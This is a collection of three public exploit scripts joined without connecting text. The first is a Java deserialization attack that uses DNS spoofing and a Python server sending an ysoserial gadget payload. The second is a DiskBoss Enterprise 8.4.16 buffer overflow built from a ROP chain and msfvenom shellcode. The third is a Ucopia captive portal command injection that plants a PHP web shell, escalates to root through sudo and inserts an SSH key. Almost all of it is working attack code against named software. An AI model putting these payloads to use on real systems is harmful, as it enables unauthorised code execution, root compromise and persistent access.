# Then poison DNS requests to the www.ersdata.com domain:
# DNS Spoof https://github.com/devleoper/arp-dns-spoof
# root@kali:/usr/share/arp-dns-spoof# cat dns_packet_spoof.py | egrep "domain =|localIP ="
# domain = 'www.ersdata.com' # domain to be spoofed
# localIP = '192.168.85.131' # IP address for poisoned hosts.
# Run the request handler on the attacking machine, which will answer all requests with malicous serialized gadgets. For example:
#!/usr/bin/python
import SocketServer, sys
from SimpleHTTPServer import SimpleHTTPRequestHandler
# POST Handler
class HTTPHandler(SimpleHTTPRequestHandler):
def __init__(self,req,client_addr,server):
SimpleHTTPRequestHandler.__init__(self,req,client_addr,server)
def do_POST(self):
# java -jar ysoserial-master-v0.0.5-g1f2e7bf-14.jar CommonsCollections1 calc.exe > calc.bin
# python -c 'import binascii, re;print "\\x"+"\\x".join(re.findall("..",binascii.hexlify(open("calc.bin","rb").read())))'
response = ( "\xac\xed\x00\x05\x73\x72\x00\x32\x73\x75\x6e\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x61\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x2e\x41\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x55\xca\xf5\x0f\x15\xcb\x7e\xa5\x02\x00\x02\x4c\x00\x0c\x6d\x65\x6d\x62\x65\x72\x56\x61\x6c\x75\x65\x73\x74\x00\x0f\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4d\x61\x70\x3b\x4c\x00\x04\x74\x79\x70\x65\x74\x00\x11\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x78\x70\x73\x7d\x00\x00\x00\x01\x00\x0d\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x4d\x61\x70\x78\x72\x00\x17\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x50\x72\x6f\x78\x79\xe1\x27\xda\x20\xcc\x10\x43\xcb\x02\x00\x01\x4c\x00\x01\x68\x74\x00\x25\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x72\x65\x66\x6c\x65\x63\x74\x2f\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x78\x70\x73\x71\x00\x7e\x00\x00\x73\x72\x00\x2a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x6d\x61\x70\x2e\x4c\x61\x7a\x79\x4d\x61\x70\x6e\xe5\x94\x82\x9e\x79\x10\x94\x03\x00\x01\x4c\x00\x07\x66\x61\x63\x74\x6f\x72\x79\x74\x00\x2c\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x43\x68\x61\x69\x6e\x65\x64\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x30\xc7\x97\xec\x28\x7a\x97\x04\x02\x00\x01\x5b\x00\x0d\x69\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x73\x74\x00\x2d\x5b\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x78\x70\x75\x72\x00\x2d\x5b\x4c\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\xbd\x56\x2a\xf1\xd8\x34\x18\x99\x02\x00\x00\x78\x70\x00\x00\x00\x05\x73\x72\x00\x3b\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x43\x6f\x6e\x73\x74\x61\x6e\x74\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x58\x76\x90\x11\x41\x02\xb1\x94\x02\x00\x01\x4c\x00\x09\x69\x43\x6f\x6e\x73\x74\x61\x6e\x74\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x78\x70\x76\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x52\x75\x6e\x74\x69\x6d\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x49\x6e\x76\x6f\x6b\x65\x72\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x87\xe8\xff\x6b\x7b\x7c\xce\x38\x02\x00\x03\x5b\x00\x05\x69\x41\x72\x67\x73\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x4c\x00\x0b\x69\x4d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x0b\x69\x50\x61\x72\x61\x6d\x54\x79\x70\x65\x73\x74\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x78\x70\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x00\x00\x00\x02\x74\x00\x0a\x67\x65\x74\x52\x75\x6e\x74\x69\x6d\x65\x75\x72\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x43\x6c\x61\x73\x73\x3b\xab\x16\xd7\xae\xcb\xcd\x5a\x99\x02\x00\x00\x78\x70\x00\x00\x00\x00\x74\x00\x09\x67\x65\x74\x4d\x65\x74\x68\x6f\x64\x75\x71\x00\x7e\x00\x1e\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\xa0\xf0\xa4\x38\x7a\x3b\xb3\x42\x02\x00\x00\x78\x70\x76\x71\x00\x7e\x00\x1e\x73\x71\x00\x7e\x00\x16\x75\x71\x00\x7e\x00\x1b\x00\x00\x00\x02\x70\x75\x71\x00\x7e\x00\x1b\x00\x00\x00\x00\x74\x00\x06\x69\x6e\x76\x6f\x6b\x65\x75\x71\x00\x7e\x00\x1e\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x76\x71\x00\x7e\x00\x1b\x73\x71\x00\x7e\x00\x16\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x78\x70\x00\x00\x00\x01\x74\x00\x08\x63\x61\x6c\x63\x2e\x65\x78\x65\x74\x00\x04\x65\x78\x65\x63\x75\x71\x00\x7e\x00\x1e\x00\x00\x00\x01\x71\x00\x7e\x00\x23\x73\x71\x00\x7e\x00\x11\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x67\x65\x72\x12\xe2\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75\x65\x78\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4e\x75\x6d\x62\x65\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00\x78\x70\x00\x00\x00\x01\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x00\x77\x08\x00\x00\x00\x10\x00\x00\x00\x00\x78\x78\x76\x72\x00\x12\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x76\x65\x72\x72\x69\x64\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x70\x71\x00\x7e\x00\x3a"
)
self.send_response(200)
self.send_header("Content-type", "text/html")
self.send_header("Content-length", len(response))
self.end_headers()
self.wfile.write(response)
try:
httpd = SocketServer.TCPServer(("", 3311), HTTPHandler)
print "Serving at port: ", 3311
httpd.serve_forever()
except:
print "Exiting..."
#!/usr/bin/python
#========================================================================================================================
# Exploit Author: C4t0ps1s
# Exploit Title: DiskBoss Enterprise v8.4.16 Local Buffer Overflow(Code execution)
# Date: 03-10-2017
# Twitter: @C4t0ps1s
# Email: C4t0ps1s@gmail.com
# Vulnerable Software: DiskBoss Enterprise v8.4.16
# Vendor Homepage: http://www.diskboss.com
# Version: v8.4.16
# Software Link: http://www.diskboss.com/downloads.html
# Tested On: Windows 10 x64
#
# Code execution from the PoC of Touhid M.Shaikh: https://www.exploit-db.com/exploits/42917/
#
# To reproduce the code execution:
# 1. Click Server
# 2. Click Connect
# 3. In the "Share Name" field, paste the content of shareName.txt , And try to connect
#
#========================================================================================================================
import struct
buff = "a"*1312
#push esp | pop esi | retn 4
buff += struct.pack("<L",0x65247445)
#mov eax, esi | pop esi | retn 4
buff += struct.pack("<L",0x65273f24)
buff += "PADD"
buff += "PADD"
#pop ebx | retn
buff += struct.pack("<L",0x65222936)
buff += "PADD"
buff += struct.pack("<L",0x7f7f7f7f)
#add eax, ebx | pop esi | pop ebx | retn 0xc
buff += struct.pack("<L",0x65222d7d)
buff += "PADD"
buff += struct.pack("<L",0x7f7f7f7f)
#add eax, ebx | pop esi | pop ebx | retn 0xc
buff += struct.pack("<L",0x65222d7d)
buff += "PADD"
buff += "PADD"
buff += "PADD"
buff += "PADD"
buff += struct.pack("<L",0x0101015a)
#add eax, ebx | pop esi | pop ebx | retn 0xc
buff += struct.pack("<L",0x65222d7d)
buff += "PADD"
buff += "PADD"
buff += "PADD"
buff += "PADD"
buff += "PADD"
#jmp eax
buff += struct.pack("<L",0x65217d28)
#inc eax
buff += "\x40"*20
#msfvenom -a x86 --platform windows -p windows/exec CMD="calc.exe" -e x86/alpha_mixed BufferRegister=EAX -f raw
sc = "\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
sc += "\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41"
sc += "\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41"
sc += "\x42\x75\x4a\x49\x39\x6c\x68\x68\x6e\x62\x45\x50\x75\x50\x37\x70"
sc += "\x31\x70\x6f\x79\x78\x65\x66\x51\x6b\x70\x50\x64\x4e\x6b\x52\x70"
sc += "\x56\x50\x6c\x4b\x51\x42\x44\x4c\x6e\x6b\x43\x62\x55\x44\x6e\x6b"
sc += "\x64\x32\x57\x58\x76\x6f\x68\x37\x42\x6a\x47\x56\x44\x71\x49\x6f"
sc += "\x6c\x6c\x75\x6c\x75\x31\x73\x4c\x73\x32\x76\x4c\x31\x30\x6a\x61"
sc += "\x4a\x6f\x74\x4d\x66\x61\x5a\x67\x38\x62\x4b\x42\x52\x72\x70\x57"
sc += "\x4e\x6b\x52\x72\x66\x70\x6c\x4b\x33\x7a\x35\x6c\x6c\x4b\x42\x6c"
sc += "\x77\x61\x52\x58\x6a\x43\x37\x38\x55\x51\x6b\x61\x33\x61\x4e\x6b"
sc += "\x73\x69\x65\x70\x47\x71\x7a\x73\x6e\x6b\x67\x39\x36\x78\x4b\x53"
sc += "\x75\x6a\x72\x69\x6e\x6b\x45\x64\x4e\x6b\x43\x31\x58\x56\x56\x51"
sc += "\x79\x6f\x6e\x4c\x6b\x71\x6a\x6f\x34\x4d\x43\x31\x39\x57\x65\x68"
sc += "\x39\x70\x71\x65\x7a\x56\x73\x33\x51\x6d\x5a\x58\x45\x6b\x51\x6d"
sc += "\x44\x64\x74\x35\x4d\x34\x30\x58\x4e\x6b\x31\x48\x74\x64\x75\x51"
sc += "\x4a\x73\x65\x36\x4c\x4b\x54\x4c\x32\x6b\x4e\x6b\x36\x38\x57\x6c"
sc += "\x53\x31\x48\x53\x4c\x4b\x75\x54\x4c\x4b\x77\x71\x7a\x70\x4f\x79"
sc += "\x77\x34\x61\x34\x64\x64\x61\x4b\x43\x6b\x61\x71\x43\x69\x71\x4a"
sc += "\x62\x71\x59\x6f\x6b\x50\x61\x4f\x33\x6f\x33\x6a\x6c\x4b\x46\x72"
sc += "\x78\x6b\x4c\x4d\x43\x6d\x73\x5a\x37\x71\x6c\x4d\x6e\x65\x58\x32"
sc += "\x47\x70\x55\x50\x47\x70\x32\x70\x45\x38\x56\x51\x4c\x4b\x42\x4f"
sc += "\x6f\x77\x69\x6f\x4b\x65\x4f\x4b\x78\x70\x6e\x55\x69\x32\x53\x66"
sc += "\x65\x38\x4f\x56\x6c\x55\x4f\x4d\x6d\x4d\x6b\x4f\x4a\x75\x45\x6c"
sc += "\x66\x66\x53\x4c\x75\x5a\x6f\x70\x69\x6b\x69\x70\x42\x55\x53\x35"
sc += "\x6d\x6b\x51\x57\x65\x43\x31\x62\x42\x4f\x71\x7a\x45\x50\x72\x73"
sc += "\x4b\x4f\x78\x55\x35\x33\x35\x31\x32\x4c\x55\x33\x46\x4e\x75\x35"
sc += "\x43\x48\x50\x65\x55\x50\x41\x41"
buff += sc
f = open("shareName.txt","wb")
f.write(buff)
f.close()
# Exploit Title: Unauthenticated remote root code execution on captive
portal Ucopia <= 5.1
# Date: 02/10/17
# Exploit Author: agix
# Vendor Homepage: http://www.ucopia.com/
# Version: <= 5.1
# Don't know in which version they exactly fixed it.
# When you connect to Ucopia wifi guest, every requests are redirected to controller.access.network
# First create easier to use php backdoor
https://controller.access.network/autoconnect_redirector.php?client_ip=127.0.0.1;echo%20'<?php system($_GET[0]);%20?>'>/var/www/html/upload/bd.php;echo%20t
# As php is in sudoers without password...
https://controller.access.network/upload/bd.php?0=sudo%20/usr/bin/php%20-r%20%27system("id");%27
# Just push your ssh key and get nice root access (ssh is open by default even from wifi guest)
https://controller.access.network/upload/bd.php?0=sudo%20/usr/bin/php%20-r%20%27system("echo%20ssh-rsa%20AAAA[...]%20>>%20/root/.ssh/authorized_keys");%27